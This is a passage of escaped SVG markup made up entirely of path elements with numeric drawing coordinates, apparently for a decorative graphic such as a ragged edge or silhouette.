d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3